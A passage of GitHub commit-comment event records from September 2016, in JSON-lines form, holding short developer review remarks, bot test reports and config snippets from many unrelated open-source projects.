{"id":"4578887368","type":"CommitCommentEvent","actor":{"login":"bubbie"},"repo":{"name":"bubbie/bluks-adventure-into-space"},"payload":{"comment":{"id":19068018,"position":16,"line":25,"path":"main.lua","commit_id":"9ee16b27aab99d9480c46ce7d178d4a23598597e","created_at":"2016-09-17T23:56:45Z","updated_at":"2016-09-17T23:56:45Z","body":"http://puu.sh/reQ4I/1316bfe394.png"}},"created_at":"2016-09-17T23:56:45Z"}
{"id":"4578887954","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19068020,"position":73,"line":248,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T23:57:20Z","updated_at":"2016-09-17T23:57:20Z","body":"Ahh, like Rust's ownership. Which is really cool 'cause you can prevent a file being used after it was closed."}},"created_at":"2016-09-17T23:57:20Z"}
{"id":"4578888207","type":"CommitCommentEvent","actor":{"login":"nick4814"},"repo":{"name":"nick4814/CP1404_Practicals"},"payload":{"comment":{"id":19068021,"position":null,"line":null,"path":null,"commit_id":"5bc7628a9d506bb3459a37518bccbb354c267158","created_at":"2016-09-17T23:57:36Z","updated_at":"2016-09-17T23:57:36Z","body":"@jonathangrech\r\nCheck formatting, naming and logic"}},"created_at":"2016-09-17T23:57:36Z"}
{"id":"4578888447","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"BenzoRoms/frameworks_base"},"payload":{"comment":{"id":19068024,"position":null,"line":null,"path":null,"commit_id":"365f6e778a93dad4e937466291f23bb34e631198","created_at":"2016-09-17T23:57:50Z","updated_at":"2016-09-17T23:57:50Z","body":"It's not work for me. What about you?"}},"created_at":"2016-09-17T23:57:50Z"}
{"id":"4578889166","type":"CommitCommentEvent","actor":{"login":"ekyl"},"repo":{"name":"ekyl/refactor"},"payload":{"comment":{"id":19068029,"position":null,"line":null,"path":null,"commit_id":"ac6e5b5b4e89f4dc39a67e247e0aee2b893f4a51","created_at":"2016-09-17T23:58:34Z","updated_at":"2016-09-17T23:58:34Z","body":"Name of this commit was erroneous; should be `Test for leap_year?`"}},"created_at":"2016-09-17T23:58:34Z"}
{"id":"4578889204","type":"CommitCommentEvent","actor":{"login":"guts94"},"repo":{"name":"MOVZX/Kenzo"},"payload":{"comment":{"id":19068030,"position":null,"line":null,"path":null,"commit_id":"fbfe5c5159a472f1562ead9ba542066a7d307700","created_at":"2016-09-17T23:58:36Z","updated_at":"2016-09-17T23:58:36Z","body":"Huh? Where did you find similarity between mine and flar's commit? Just cause flar OCed the kernel first and I did after him doesn't mean that I'm using his \"idea\" "}},"created_at":"2016-09-17T23:58:36Z"}
{"id":"4578890367","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/frameworks_base"},"payload":{"comment":{"id":19068035,"position":null,"line":null,"path":null,"commit_id":"365f6e778a93dad4e937466291f23bb34e631198","created_at":"2016-09-17T23:59:39Z","updated_at":"2016-09-17T23:59:39Z","body":"No. I need to remove it and the pull qs down with one finger"}},"created_at":"2016-09-17T23:59:39Z"}
{"id":"4577228089","type":"CommitCommentEvent","actor":{"login":"HyGlobalHD"},"repo":{"name":"ArchRPG/ARCore"},"payload":{"comment":{"id":19062708,"position":null,"line":null,"path":null,"commit_id":"2f03af05dadf4c8ad3875401b458df9166c265e5","created_at":"2016-09-17T03:00:25Z","updated_at":"2016-09-17T03:00:25Z","body":":+1: "}},"created_at":"2016-09-17T03:00:25Z"}
{"id":"4577228612","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"bryanfry/dsp"},"payload":{"comment":{"id":19062709,"position":null,"line":null,"path":null,"commit_id":"6969a7ffbadb94d982b51e77eb95516f34461a22","created_at":"2016-09-17T03:00:51Z","updated_at":"2016-09-17T03:00:51Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @bryanfry \r\n\r\nGreat work on advanced Python topics!\r\n\r\n👍 \r\n"}},"created_at":"2016-09-17T03:00:51Z"}
{"id":"4577230424","type":"CommitCommentEvent","actor":{"login":"loustler"},"repo":{"name":"codechobostudy/movie-api"},"payload":{"comment":{"id":19062716,"position":114,"line":87,"path":"src/main/java/io/codechobo/domain/member/Member.java","commit_id":"0acd11a72f9f5e25beafc665ab393d38d827c89b","created_at":"2016-09-17T03:02:19Z","updated_at":"2016-09-17T03:02:19Z","body":"@devsejong preUpdate같은 것 필요없이 Object를 통해서 할 수 있다는 말씀이시죠?? \r\n여기에 안 하고 별도로 Service Layer 등에서 처리할 수 있다는 말씀이신가요?"}},"created_at":"2016-09-17T03:02:19Z"}
{"id":"4577232364","type":"CommitCommentEvent","actor":{"login":"liyanlong"},"repo":{"name":"yuche/vue-strap"},"payload":{"comment":{"id":19062723,"position":11,"line":204,"path":"src/Input.vue","commit_id":"45c25305140cff65e01b197d702539f0ebaa9109","created_at":"2016-09-17T03:03:08Z","updated_at":"2016-09-17T03:03:08Z","body":"如果 noValidate 属性 为 true, 为什么 还需要将input组件push到formGroup 组件?"}},"created_at":"2016-09-17T03:03:08Z"}
{"id":"4577232899","type":"CommitCommentEvent","actor":{"login":"Silph-Road"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":19062727,"position":null,"line":null,"path":null,"commit_id":"56871421d8694a0f127158dbdad96539e3a4c7d9","created_at":"2016-09-17T03:03:36Z","updated_at":"2016-09-17T03:03:36Z","body":":-)"}},"created_at":"2016-09-17T03:03:36Z"}
{"id":"4577236201","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"jingai/skin.metropolis"},"payload":{"comment":{"id":19062739,"position":null,"line":null,"path":null,"commit_id":"864a5d3423c9aa7b9698e7c20245e88dcbd41c34","created_at":"2016-09-17T03:06:27Z","updated_at":"2016-09-17T03:06:27Z","body":"The hours views are back, but the maps seem to be gone."}},"created_at":"2016-09-17T03:06:27Z"}
{"id":"4577240078","type":"CommitCommentEvent","actor":{"login":"MarkehMe"},"repo":{"name":"lucko/FactionsFramework"},"payload":{"comment":{"id":19062758,"position":null,"line":null,"path":null,"commit_id":"d5411c5d593190832233cf3367919742e285b675","created_at":"2016-09-17T03:09:54Z","updated_at":"2016-09-17T03:09:54Z","body":"I don't discourage shading, I understand its usefulness! Just won't work too well with this framework, it's intention is to be like the Vault for Factions! \r\n\r\nI am working on a library though that will only be useable through shading so I'll be sure to let you know about that when it comes! "}},"created_at":"2016-09-17T03:09:54Z"}
{"id":"4577241538","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"bryanfry/dsp"},"payload":{"comment":{"id":19062762,"position":null,"line":null,"path":null,"commit_id":"98584bb63e0ff62df2354102e7117d7c4f09938a","created_at":"2016-09-17T03:11:06Z","updated_at":"2016-09-17T03:11:06Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @bryanfry \r\n\r\nGood work on linear algebra also!\r\n\r\nI note a few typos: \r\n- The shape of C is 3X2, not 2X2;\r\n- The shape of D is 2X3, not 2X4;\r\n- The shape of w is 4X1 and w should be represented by `w=np.array([[1],[8],[0],[5]])`;\r\n- The second component of `u+v` is 7, not 8.\r\n\r\n👍 "}},"created_at":"2016-09-17T03:11:06Z"}
{"id":"4577242404","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19062765,"position":703,"line":799,"path":"punishments.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-17T03:11:50Z","updated_at":"2016-09-17T03:11:50Z","body":"Good catch!\r\n\r\nThis is why we need TypeScript and/or Flow!"}},"created_at":"2016-09-17T03:11:50Z"}
{"id":"4577245904","type":"CommitCommentEvent","actor":{"login":"puppetpies"},"repo":{"name":"maiha/pcap.cr"},"payload":{"comment":{"id":19062774,"position":null,"line":null,"path":null,"commit_id":"9c327417454992d25abc6a053c4e7ef208f6858d","created_at":"2016-09-17T03:15:04Z","updated_at":"2016-09-17T03:15:04Z","body":"Ok -r it is for reading.\r\n\r\nThat leaves -w for writing output pcap files like in tcpdump or tshark !"}},"created_at":"2016-09-17T03:15:04Z"}
{"id":"4577248777","type":"CommitCommentEvent","actor":{"login":"T-Pham"},"repo":{"name":"T-Pham/Switch"},"payload":{"comment":{"id":19062779,"position":null,"line":null,"path":null,"commit_id":"c55d6031ab725d85dc363d783e6838d85129f909","created_at":"2016-09-17T03:17:47Z","updated_at":"2016-09-17T03:17:47Z","body":"This closes #1."}},"created_at":"2016-09-17T03:17:47Z"}
{"id":"4577249266","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19062780,"position":null,"line":null,"path":null,"commit_id":"1353c0c04d887cbe2318b7a4dd5e5f00de046b73","created_at":"2016-09-17T03:18:12Z","updated_at":"2016-09-17T03:18:12Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1194 of 1213 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.43%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-32.1%25-green.svg)</a>\n"}},"created_at":"2016-09-17T03:18:12Z"}
{"id":"4577250605","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19062783,"position":145,"line":1609,"path":"commands.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-17T03:19:25Z","updated_at":"2016-09-17T03:19:25Z","body":"Um, I mean, because locks are always global."}},"created_at":"2016-09-17T03:19:25Z"}
{"id":"4577253614","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19062793,"position":null,"line":null,"path":null,"commit_id":"b6513213ad449a981aeb5f3a9197d2d3c42ac0cf","created_at":"2016-09-17T03:22:11Z","updated_at":"2016-09-17T03:22:11Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2303 of 2472 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b6513213ad449a981aeb5f3a9197d2d3c42ac0cf-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b6513213ad449a981aeb5f3a9197d2d3c42ac0cf-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.16%25-yellow.svg)</a> \n"}},"created_at":"2016-09-17T03:22:11Z"}
{"id":"4577254545","type":"CommitCommentEvent","actor":{"login":"maiha"},"repo":{"name":"maiha/pcap.cr"},"payload":{"comment":{"id":19062798,"position":null,"line":null,"path":null,"commit_id":"9c327417454992d25abc6a053c4e7ef208f6858d","created_at":"2016-09-17T03:23:02Z","updated_at":"2016-09-17T03:23:02Z","body":"Yep, you are completely right!\r\nI misled `-w` that has already been used for \"ignoring whitespaces\" :)\r\nWe should use it for `writing` and consider new option for \"whitespaces\"!"}},"created_at":"2016-09-17T03:23:02Z"}
{"id":"4577254827","type":"CommitCommentEvent","actor":{"login":"kushwiener"},"repo":{"name":"bSchnepp/SimplisticVM"},"payload":{"comment":{"id":19062801,"position":null,"line":null,"path":null,"commit_id":"8084a0a948ff800073f8ff8d4b45bf77852d8c2d","created_at":"2016-09-17T03:23:19Z","updated_at":"2016-09-17T03:23:19Z","body":"Good one Brian!"}},"created_at":"2016-09-17T03:23:19Z"}
{"id":"4577255222","type":"CommitCommentEvent","actor":{"login":"kushwiener"},"repo":{"name":"bSchnepp/SimplisticVM"},"payload":{"comment":{"id":19062806,"position":null,"line":null,"path":null,"commit_id":"8084a0a948ff800073f8ff8d4b45bf77852d8c2d","created_at":"2016-09-17T03:23:43Z","updated_at":"2016-09-17T03:23:43Z","body":"Am I that tool?"}},"created_at":"2016-09-17T03:23:43Z"}
{"id":"4577257684","type":"CommitCommentEvent","actor":{"login":"yangshun"},"repo":{"name":"cdebotton/react-universal"},"payload":{"comment":{"id":19062820,"position":7,"line":16,"path":".flowconfig","commit_id":"e57aadbcbd8be4e2031f308187392f44d02b44f9","created_at":"2016-09-17T03:25:45Z","updated_at":"2016-09-17T03:25:45Z","body":"Another approach would be to make the various dirs a matching group so that they don't have to be repeated across multiple lines (only 3 dirs shown for illustration):\r\n```\r\nmodule.name_mapper='^\\(actions\\|components\\|constants\\)\\/\\(.*\\)$' -> '<PROJECT_ROOT>/src/js/\\1/\\2'\r\n```"}},"created_at":"2016-09-17T03:25:45Z"}
{"id":"4577260412","type":"CommitCommentEvent","actor":{"login":"puppetpies"},"repo":{"name":"maiha/pcap.cr"},"payload":{"comment":{"id":19062826,"position":null,"line":null,"path":null,"commit_id":"9c327417454992d25abc6a053c4e7ef208f6858d","created_at":"2016-09-17T03:26:58Z","updated_at":"2016-09-17T03:26:58Z","body":"Well didn't somebody write something less restrictive than and better than options parser in crystal i think they did."}},"created_at":"2016-09-17T03:26:58Z"}
{"id":"4577264871","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19062842,"position":null,"line":null,"path":null,"commit_id":"2453f84484a0c1e8cd2d637acf92ae0aa93268fe","created_at":"2016-09-17T03:31:01Z","updated_at":"2016-09-17T03:31:01Z","body":"嗯？没有用吗\r\n我记得我还用os.system('date')测试过来着。。。\r\n看git输出的`HEAD 现在位于 abcdefg` 也应该没问题啊。。"}},"created_at":"2016-09-17T03:31:01Z"}
{"id":"4577268039","type":"CommitCommentEvent","actor":{"login":"dblevins"},"repo":{"name":"microprofile/gitpress"},"payload":{"comment":{"id":19062851,"position":7,"line":7,"path":"src/main/static/assets/templates/dir_presentations.jade","commit_id":"07c3bdd003318834c91c50e05f7baf586d4e1017","created_at":"2016-09-17T03:33:53Z","updated_at":"2016-09-17T03:33:53Z","body":"@karianna don't see a MicroProfile.pdf in the repo anywhere.  Possibly a missed add.  I need to redeploy the site to update the IBM logo and add the blog support.  Will yank the \"presentations\" menu item for now.  Go ahead and add the pdf and re-add the link and  when you get a moment."}},"created_at":"2016-09-17T03:33:53Z"}
{"id":"4577273390","type":"CommitCommentEvent","actor":{"login":"andres-erbsen"},"repo":{"name":"mit-plv/fiat-crypto"},"payload":{"comment":{"id":19062859,"position":null,"line":null,"path":null,"commit_id":"7fd387e4ac13e38620ad480afafeca53caa7dabb","created_at":"2016-09-17T03:38:50Z","updated_at":"2016-09-17T03:38:50Z","body":"Is there any explanation to this?"}},"created_at":"2016-09-17T03:38:50Z"}
{"id":"4577275927","type":"CommitCommentEvent","actor":{"login":"rachanta"},"repo":{"name":"rachanta/racer-n5x"},"payload":{"comment":{"id":19062864,"position":null,"line":null,"path":null,"commit_id":"39e8795fbd423da2667cbfbfa4eaa5237e635d11","created_at":"2016-09-17T03:40:54Z","updated_at":"2016-09-17T03:40:54Z","body":"OK"}},"created_at":"2016-09-17T03:40:54Z"}
{"id":"4577276555","type":"CommitCommentEvent","actor":{"login":"markietard"},"repo":{"name":"iseekwonderful/csgoGlow"},"payload":{"comment":{"id":19062868,"position":null,"line":null,"path":null,"commit_id":"fdf660197de7983d340f837b058f51fee639c849","created_at":"2016-09-17T03:41:26Z","updated_at":"2016-09-17T03:41:26Z","body":"It says *BUILD FAILED* whenever I try to hit the build button in Xcode when I try to compile the file. "}},"created_at":"2016-09-17T03:41:26Z"}
{"id":"4577278444","type":"CommitCommentEvent","actor":{"login":"Explorer09"},"repo":{"name":"hishamhm/htop"},"payload":{"comment":{"id":19062884,"position":null,"line":null,"path":null,"commit_id":"5df425867cd992ccadbe8b5cf713404fd53db7df","created_at":"2016-09-17T03:43:14Z","updated_at":"2016-09-17T03:43:14Z","body":"I have no idea what this change means. Does this mean that we are not listing realtime signals *at all* when the OS supports too many (more than 101) of them? (For me I would show only first 100 signals (SIGRTMIN to SIGRTMIN+99) in case that happens.)\r\n\r\nAlso, you removed the display of SIGRTMAX, replacing it with another SIGRTMIN+n notation. I'm not sure if this is intentional or not."}},"created_at":"2016-09-17T03:43:14Z"}
{"id":"4577278639","type":"CommitCommentEvent","actor":{"login":"ben-manes"},"repo":{"name":"zodb/relstorage"},"payload":{"comment":{"id":19062885,"position":null,"line":null,"path":null,"commit_id":"601f5e16a3331b9bae0bb6a7f3612ecb68418421","created_at":"2016-09-17T03:43:29Z","updated_at":"2016-09-17T03:43:29Z","body":"In the Java and Go versions we populate the probation segment when from eden. When the cache is not full then its admitted directly. When the probation segment is full, but the protected is not, we borrow the space. I agree with your observation that you definitely want the cache to fill up to capacity rather than evicting prematurely."}},"created_at":"2016-09-17T03:43:29Z"}
{"id":"4577280783","type":"CommitCommentEvent","actor":{"login":"TylerJaacks"},"repo":{"name":"abullard/harambeSimulator"},"payload":{"comment":{"id":19062895,"position":null,"line":null,"path":null,"commit_id":"c3e335742af71cc971fb04d662a3c1b6a31546a2","created_at":"2016-09-17T03:45:27Z","updated_at":"2016-09-17T03:45:27Z","body":"Removed Old Assets Folder\r\n"}},"created_at":"2016-09-17T03:45:27Z"}
{"id":"4577285947","type":"CommitCommentEvent","actor":{"login":"DeinFreund"},"repo":{"name":"ZeroK-RTS/Zero-K-Infrastructure"},"payload":{"comment":{"id":19062913,"position":24,"line":279,"path":"ZkLobbyServer/ServerBattle.cs","commit_id":"1213385d4593de9157581ff1ceb14ce793746794","created_at":"2016-09-17T03:48:54Z","updated_at":"2016-09-17T03:48:54Z","body":"Nice spelling."}},"created_at":"2016-09-17T03:48:54Z"}
{"id":"4577286188","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19062916,"position":null,"line":null,"path":null,"commit_id":"f92ff090099e2a23abe28140f67b8c424c53569e","created_at":"2016-09-17T03:49:08Z","updated_at":"2016-09-17T03:49:08Z","body":"input_processor_refactor (mbadams5) - x86_64-MacOS-10.9-clang: Tests Failed (1814 of 2354 tests passed, 21 test warnings)\n\n * 504 tests had: AUD diffs.\n * 487 tests had: EIO diffs.\n * 467 tests had: Table big diffs.\n * 209 tests had: RDD diffs.\n * 364 tests had: MTD diffs.\n * 137 tests had: ERR diffs.\n * 268 tests had: DXF diffs.\n * 1 test had: S...\n * 385 tests had: SHD diffs.\n * 403 tests had: BND diffs.\n * 292 tests had: MDD diffs.\n * 184 tests had: SSZ big diffs.\n * 14 tests had: ESO big diffs.\n * 9 tests had: MTR big diffs.\n * 9 tests had: ZSZ small diffs.\n * 28 tests had: ESO small diffs.\n * 22 tests had: MTR small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: M...\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-77.06%25-red.svg)</a> \n"}},"created_at":"2016-09-17T03:49:08Z"}
{"id":"4577286586","type":"CommitCommentEvent","actor":{"login":"Explorer09"},"repo":{"name":"hishamhm/htop"},"payload":{"comment":{"id":19062920,"position":null,"line":null,"path":null,"commit_id":"5df425867cd992ccadbe8b5cf713404fd53db7df","created_at":"2016-09-17T03:49:27Z","updated_at":"2016-09-17T03:49:27Z","body":"By the way, this change `\"%2d SIGRTMIN%+d\" -> \"%2d SIGRTMIN%-+3d\"` is technically redundant. Leaving out the field width will make the numbers left-aligned already; adding that field width along with the \"-\" char adds nothing but useless padding space."}},"created_at":"2016-09-17T03:49:27Z"}
{"id":"4577287132","type":"CommitCommentEvent","actor":{"login":"Mothigithub"},"repo":{"name":"futuresimple/android-floating-action-button"},"payload":{"comment":{"id":19062929,"position":null,"line":null,"path":null,"commit_id":"f2353f1eda2f01f6f5817ad32d2e1bffb8f66f00","created_at":"2016-09-17T03:49:55Z","updated_at":"2016-09-17T03:49:55Z","body":"https://github.com/futuresimple/android-floating-action-button/commit/f2353f1eda2f01f6f5817ad32d2e1bffb8f66f00?diff=split#diff-cedd241c3089ff270ad464070a3463b1"}},"created_at":"2016-09-17T03:49:55Z"}
{"id":"4577287790","type":"CommitCommentEvent","actor":{"login":"lsnow2017"},"repo":{"name":"jamrizzi/deskterm"},"payload":{"comment":{"id":19062937,"position":null,"line":null,"path":null,"commit_id":"e9c8347a16497b44e9a9428ad15441a5539bd8d7","created_at":"2016-09-17T03:50:29Z","updated_at":"2016-09-17T03:50:29Z","body":"Hey, I like the idea but unfortunately I had some trouble on my system and I was wondering how it would be best to uninstall/remove it?"}},"created_at":"2016-09-17T03:50:29Z"}
{"id":"4577288674","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zodb/relstorage"},"payload":{"comment":{"id":19062944,"position":null,"line":null,"path":null,"commit_id":"601f5e16a3331b9bae0bb6a7f3612ecb68418421","created_at":"2016-09-17T03:51:15Z","updated_at":"2016-09-17T03:51:15Z","body":"Thank you, I appreciate the review."}},"created_at":"2016-09-17T03:51:15Z"}
{"id":"4577288932","type":"CommitCommentEvent","actor":{"login":"jacklam718"},"repo":{"name":"jacklam718/react-native-popup-dialog"},"payload":{"comment":{"id":19062945,"position":null,"line":null,"path":null,"commit_id":"284417ae70d1eab8b0c0fdb9e18ea8601035d741","created_at":"2016-09-17T03:51:28Z","updated_at":"2016-09-17T03:51:28Z","body":"set the default value on where?"}},"created_at":"2016-09-17T03:51:28Z"}
{"id":"4577290309","type":"CommitCommentEvent","actor":{"login":"ben-manes"},"repo":{"name":"zodb/relstorage"},"payload":{"comment":{"id":19062949,"position":null,"line":null,"path":null,"commit_id":"601f5e16a3331b9bae0bb6a7f3612ecb68418421","created_at":"2016-09-17T03:52:42Z","updated_at":"2016-09-17T03:52:42Z","body":"Thank you for putting an honest effort at evaluating this idea. If it doesn't work out, oh well, but I do appreciate that you're giving it an honest try."}},"created_at":"2016-09-17T03:52:42Z"}
{"id":"4577291830","type":"CommitCommentEvent","actor":{"login":"JasonGross"},"repo":{"name":"mit-plv/fiat-crypto"},"payload":{"comment":{"id":19062957,"position":null,"line":null,"path":null,"commit_id":"7fd387e4ac13e38620ad480afafeca53caa7dabb","created_at":"2016-09-17T03:54:14Z","updated_at":"2016-09-17T03:54:14Z","body":"Nope.  Well, some. You're welcome to debug it more.  I stopped when I noticed that in 8.5 (only; fixed already in pl1) the `reflexivity` tactic wasn't picking up `Reflexive` proofs in the context.  So I replaced it with `apply <projection>`, which is less magic, and succeeded at type class resolution.  @mattam82 might know what was fixed between 8.5 and 8.5pl1, but I don't recall any bugs about this."}},"created_at":"2016-09-17T03:54:14Z"}
{"id":"4577292552","type":"CommitCommentEvent","actor":{"login":"gdi2290"},"repo":{"name":"angular/universal-starter"},"payload":{"comment":{"id":19062960,"position":17,"line":57,"path":"webpack.config.ts","commit_id":"b34cfff1eeed79b66ff5c52f77b7175806e0884d","created_at":"2016-09-17T03:54:51Z","updated_at":"2016-09-17T03:54:51Z","body":"add more depending on material components"}},"created_at":"2016-09-17T03:54:51Z"}
{"id":"4577292763","type":"CommitCommentEvent","actor":{"login":"gdi2290"},"repo":{"name":"angular/universal-starter"},"payload":{"comment":{"id":19062962,"position":23,"line":63,"path":"webpack.config.ts","commit_id":"b34cfff1eeed79b66ff5c52f77b7175806e0884d","created_at":"2016-09-17T03:55:01Z","updated_at":"2016-09-17T03:55:01Z","body":"include more material components here"}},"created_at":"2016-09-17T03:55:01Z"}
{"id":"4577293584","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19062968,"position":null,"line":null,"path":null,"commit_id":"3a311556050ee70e71c43c3ca6bc86165174da77","created_at":"2016-09-17T03:55:45Z","updated_at":"2016-09-17T03:55:45Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-17T03:55:45Z"}
{"id":"4577294475","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zodb/relstorage"},"payload":{"comment":{"id":19062972,"position":null,"line":null,"path":null,"commit_id":"601f5e16a3331b9bae0bb6a7f3612ecb68418421","created_at":"2016-09-17T03:56:31Z","updated_at":"2016-09-17T03:56:31Z","body":"The research seems to check out, and it's not any more complicated than what I was considering, so I'm pretty happy to be pursuing this. I think the perf issues I'm seeing are solvable with some more effort, and I'm optimistic about the end results. Caching is absolutely critical to ZODB in general and RelStorage in particular, so it's worth spending some time here. Thanks again for your input, it's been invaluable. (I admit I'm curious, though, as to what attracted your attention to this relatively obscure issue?)"}},"created_at":"2016-09-17T03:56:31Z"}
{"id":"4577294757","type":"CommitCommentEvent","actor":{"login":"PetronellaSimonsbacka"},"repo":{"name":"PetronellaSimonsbacka/practice_ruby"},"payload":{"comment":{"id":19062975,"position":null,"line":null,"path":null,"commit_id":"f0ff1c382379fb687268d7972744c1c8c4e46aec","created_at":"2016-09-17T03:56:45Z","updated_at":"2016-09-17T03:56:45Z","body":"I want to create a practice app for basic Ruby"}},"created_at":"2016-09-17T03:56:45Z"}
{"id":"4577297651","type":"CommitCommentEvent","actor":{"login":"AirwavesMan"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19062986,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-17T03:59:23Z","updated_at":"2016-09-17T03:59:23Z","body":"Well it seems that I fixed the problem or it is better to say I know where the swimming in the ground comes from. Im not sure I mentioned it earlier but I got only stuck after login or after relog. I did not test changing clothes, respawn worked fine for me.\r\nIn the mission.sqm we have: \r\n\r\n```\r\n#define PLRDEF position[]={126,0,158};azimut=0;side=\"WEST\";vehicle=\"Survivor1_DZ\";skill=0.6;init=\"this enableSimulation false;this allowDammage false;this disableAI 'FSM';this disableAI 'ANIM';this disableAI 'MOVE';\";player=\"PLAY CDG\";\r\n\t\t\t\tclass Item0{id=0;PLRDEF};\r\n\t\t\t\tclass Item1\r\n\t\t\t\t{\r\n\t\t\t\t\tposition[]={126,0,158};\r\n\t\t\t\t\tazimut=0;\r\n\t\t\t\t\tid=0;\r\n\t\t\t\t\tside=\"WEST\";\r\n\t\t\t\t\tvehicle=\"Survivor1_DZ\";\r\n\t\t\t\t\tplayer=\"PLAYER COMMANDER\";\r\n\t\t\t\t\tleader=1;\r\n\t\t\t\t\trank=\"SERGEANT\";\r\n\t\t\t\t\tskill=0.6;\r\n\t\t\t\t\tinit=\"this enableSimulation false;this allowDammage false;this disableAI 'FSM';this disableAI 'ANIM';this disableAI 'MOVE';\";\r\n\t\t\t\t};\r\n```\r\nAfter changing both coords {126,0,158} to mainland or island coords not over or in water, my swimming in the ground was fixed. "}},"created_at":"2016-09-17T03:59:23Z"}
{"id":"4577297662","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"mjain-1/dsp"},"payload":{"comment":{"id":19062987,"position":null,"line":null,"path":null,"commit_id":"d067afe2386763720ab2d8e063a81267c0951a92","created_at":"2016-09-17T03:59:24Z","updated_at":"2016-09-17T03:59:24Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @mjain-1 \r\n\r\nNice work with Python! Here are some comments:\r\n- When writing code in markdown, use three backticks on the line just before the code and on the line just after the code. This will improve readability.\r\n- For Q4, you did not use Python's `map()` and `filter()` function. To illustrate, your first example can be written in two ways, as:\r\n```\r\nnumbers_squared = [x**2 for x in numbers]\r\nnumbers_squared = map(lambda x: x**2, numbers)\r\n```\r\n- For Q5, you forgot to include `from datetime import date` at the beginning of your code. Also, I noticed that you reformatted the given dates by hand, i.e. 14-Jul-2015 --> (2015, 7, 14), for use in the `date` function. Do you known how to let Python do this?\r\n- In Q6, the string function `verbing()` does not work properly on the string `bingo!`, as it returns `bingo!ly` instead of `bingo!`.\r\n- In Q6, the string function `front_back(a,b)` does not work for `a='abcde'` and `b='xyz'`. This is because in `str_div()`, the `math.ceil` function returns a float, which can not be used to slice strings. In addition, `len(a)/2` is an integer division and so will not work as you expect with `math.ceil`. Instead, try `int(math.ceil(len(a)/2.0))`.\r\n- Also in Q6, you need to `import math` at the beginning of your code, and remove `raise NotImplementedError`.\r\n- In Q7, nice solution for `front_x`!\r\n- In Q7, `linear_merge` sorts the combined two lists and does not make 